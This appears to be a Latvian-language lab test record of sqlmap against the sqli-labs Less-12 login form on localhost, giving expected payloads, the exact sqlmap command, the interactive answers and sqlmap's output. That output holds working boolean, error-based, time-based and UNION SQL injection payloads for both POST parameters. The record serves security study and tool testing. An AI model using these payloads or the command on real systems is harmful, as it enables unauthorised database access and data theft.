=================================================================================
1. Īpašība: savādāka vienas un tās pašas vājības variācija (piemēra sqli-labs11) - apakšesošais vaicājums sastāv nevis no pēdiņām ', bet gan no pēdiņām un iekavām ")
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: uname=test") OR 1=1-- -&passwd=test
3.2. error-based: uname=test")&passwd=test
3.3. time-based: uname=test") OR Sleep(1)-- -&passwd=test
3.4. union: uname=test") union select 1,2-- -&passwd=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 30745846 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-12/" -p uname,passwd --data="uname=test&passwd=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.3. POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
7.4. there were multiple injection points, please select the one to use for following injections: 0 (0 nozīmē = parameter: username)
=================================================================================
sqlmap identified the following injection point(s) with a total of 877 HTTP(s) requests:
---
Parameter: passwd (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=test&passwd=-8764") OR 5614=5614 AND ("dZfi"="dZfi

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test&passwd=test") AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(2581=2581,1))),0x7176707a71),2581) AND ("CqIL"="CqIL

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test&passwd=test") AND (SELECT 7424 FROM (SELECT(SLEEP(5)))VGIL) AND ("dQwW"="dQwW

Parameter: uname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: uname=test") AND 8325=(SELECT (CASE WHEN (8325=8325) THEN 8325 ELSE (SELECT 3464 UNION SELECT 5708) END))-- -&passwd=test

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test") AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(9779=9779,1))),0x7176707a71),9779) AND ("flBi"="flBi&passwd=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test") AND (SELECT 1323 FROM (SELECT(SLEEP(5)))lefJ) AND ("GOlG"="GOlG&passwd=test

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test") UNION ALL SELECT CONCAT(0x71706a7671,0x4f586e4975566a4b684f524b696470575450646c4f7967506c6c6d43774f4145417741516a4c6275,0x7176707a71),NULL-- -&passwd=test
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
